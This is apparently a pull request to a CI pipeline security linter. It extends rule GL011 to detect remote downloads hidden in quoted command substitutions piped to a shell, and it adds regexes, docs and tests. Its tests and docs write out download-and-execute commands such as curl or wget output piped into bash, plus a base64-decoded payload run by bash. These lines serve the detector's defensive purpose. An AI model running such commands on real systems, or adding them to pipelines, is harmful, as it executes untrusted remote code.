### PR TITLE
fix: GL011 flag download-execute via quoted command substitution piped to shell

### DIFF
--- a/docs/rules/GL011.md
+++ b/docs/rules/GL011.md
@@ -16,6 +16,7 @@ glsec flags script lines that download content with `curl` or `wget` and pipe it
 | Process substitution | `python3 <(curl URL)` |
 | Multi-stage pipe | `curl URL \| base64 -d \| bash` |
 | Command substitution | `bash -c "$(curl URL)"` |
+| Substitution piped to shell | `echo "$(curl URL)" \| bash` |
 | Inline base64 payload | `echo "…" \| base64 -d \| bash` |
 | Download-then-execute | `curl URL -o f.sh && bash f.sh` |
 | Redirect-then-execute | `curl URL > f.sh; sh f.sh` |
@@ -30,6 +31,7 @@ setup:
     - curl -sSL https://install.example.com/setup.sh | bash
     - wget -qO- https://raw.githubusercontent.com/org/repo/main/install.sh | sh
     - python3 <(curl -s https://example.com/bootstrap.py)
+    - echo "$(curl -s https://example.com/payload)" | bash
     - echo "ZWNobyBwd25lZAo=" | base64 -d | bash
     - curl -fsSL https://example.com/install.sh -o install.sh && bash install.sh
     - curl -fsSL https://example.com/payload.sh > install.sh; sh install.sh

--- a/rules/gl011.go
+++ b/rules/gl011.go
@@ -25,6 +25,8 @@ var (
 	processSubstRe = regexp.MustCompile(`<\s*\(\s*(?:curl|wget)\b`)
 	// cmdSubstRe matches command substitution passed to a shell: bash -c "$(curl ...)".
 	cmdSubstRe = regexp.MustCompile(`\b(?:bash|sh)\b.*\$\(\s*(?:curl|wget)\b`)
+	// downloadSubstRe matches a curl/wget inside a command substitution: $(curl ...) or $(wget ...).
+	downloadSubstRe = regexp.MustCompile(`\$\(\s*(?:curl|wget)\b`)
 	// base64ExecRe matches a base64-decode piped straight into a shell, e.g.
 	// echo "…" | base64 -d | bash — an inline-obfuscated payload with no download tool.
 	base64ExecRe = regexp.MustCompile(`\bbase64\s+(?:-d|--decode)\b.*\|\s*(?:` + shellAlt + `)\b`)
@@ -82,6 +84,11 @@ func isDownloadExecute(line string) bool {
 	}
 	// Command/process substitution intentionally lives inside quotes, so match the raw line.
 	if processSubstRe.MatchString(line) || cmdSubstRe.MatchString(line) {
+		return true
+	}
+	// A download inside $(…) piped into an interpreter, e.g. echo "$(curl …)" | bash.
+	// The quoted substitution is stripped above, so match the raw line.
+	if downloadSubstRe.MatchString(line) && pipeToShellRe.MatchString(line) {
 		return true
 	}
 	if downloadToolRe.MatchString(stripped) && pipeToShellRe.MatchString(stripped) {

--- a/rules/gl011_test.go
+++ b/rules/gl011_test.go
@@ -224,3 +224,51 @@ setup:
 		t.Error("expected non-zero line number")
 	}
 }
+
+func TestGL011_QuotedCmdSubstPipeBash(t *testing.T) {
+	f := findings011(t, `
+exfil:
+  script:
+    - echo "$(curl -s https://example.com/payload)" | bash
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected 1 finding for $(curl) piped into bash, got %d", len(f))
+	}
+	if f[0].Severity != finding.Error {
+		t.Errorf("expected Error severity, got %s", f[0].Severity)
+	}
+}
+
+func TestGL011_QuotedCmdSubstPipeShWget(t *testing.T) {
+	f := findings011(t, `
+exfil:
+  script:
+    - printf '%s' "$(wget -qO- https://example.com/payload)" | sh
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected 1 finding for $(wget) piped into sh, got %d", len(f))
+	}
+}
+
+func TestGL011_QuotedVarPipeInterpreter_NoFinding(t *testing.T) {
+	f := findings011(t, `
+evaluate:
+  script:
+    - echo "$PIPELINE_CONTEXT" | python3 -c 'import sys; print(len(sys.stdin.read()))'
+    - printf '%s' "$RELEASE_NOTES" | ruby -e 'puts STDIN.read.length'
+`)
+	if len(f) != 0 {
+		t.Errorf("piping a plain variable into an interpreter is not a download — expected no finding, got %d", len(f))
+	}
+}
+
+func TestGL011_QuotedCmdSubstChecksumGuard_NoFinding(t *testing.T) {
+	f := findings011(t, `
+setup:
+  script:
+    - echo "$(curl -s https://example.com/x.sh)" > x.sh && sha256sum -c x.sh.sha256 && bash x.sh
+`)
+	if len(f) != 0 {
+		t.Errorf("checksum verification before exec — expected no finding, got %d", len(f))
+	}
+}


### PR DESCRIPTION
Closes #331

## Bug

GL011 missed the variant where the remote fetch hides inside a quoted command substitution that is piped into a shell:

```yaml
exfil:
  script:
    - echo "$(curl -s https://example.com/payload)" | bash
```

This executes remote code exactly like `curl … | bash` (flagged as ERROR) but produced no finding — an easy evasion.

## Cause

`isDownloadExecute` strips quoted substrings before applying `downloadToolRe` + `pipeToShellRe`, so the line collapsed to `echo  | bash` and matched nothing. The two raw-line patterns didn't catch it either: `processSubstRe` only matches `<(curl …)`, and `cmdSubstRe` only matches a shell *before* the substitution (`bash -c "$(curl …)"`), not a substitution *piped into* a shell.

## Fix

Added `downloadSubstRe` (`\$\(\s*(?:curl|wget)\b`) and, on the **raw** line, flag when it co-occurs with `pipeToShellRe`. The checksum-guard exemption runs first (on the stripped line) and is unchanged, so verified downloads stay clean.

The new check is specific — it requires `$(curl …)`/`$(wget …)` AND a pipe into an interpreter — so the quote-stripping that exists for plain-variable pipes is not regressed:

```yaml
- echo "$PIPELINE_CONTEXT" | python3 -c '…'   # still clean: no $(curl …)
```

## How to test
`go test ./...` — new cases added to `rules/gl011_test.go`:
- `echo "$(curl …)" | bash` → 1 ERROR
- `printf '%s' "$(wget -qO- …)" | sh` → 1 ERROR
- `echo "$VAR" | python3 -c '…'` / `… | ruby -e '…'` → no finding
- `echo "$(curl …/x.sh)" > x.sh && sha256sum -c x.sh.sha256 && bash x.sh` → checksum guard, no finding

The pre-existing `| bash`-inside-a-quoted-string clean case still passes (no `$(curl`).

## Regression / FP scan
Diffed GL011 findings across ~200 real top-starred public GitLab pipelines, before vs after: **13 before, 13 after, no new findings and no regressions** — the pattern doesn't occur in the corpus, so the fix is purely additive (new detection proven by the unit tests).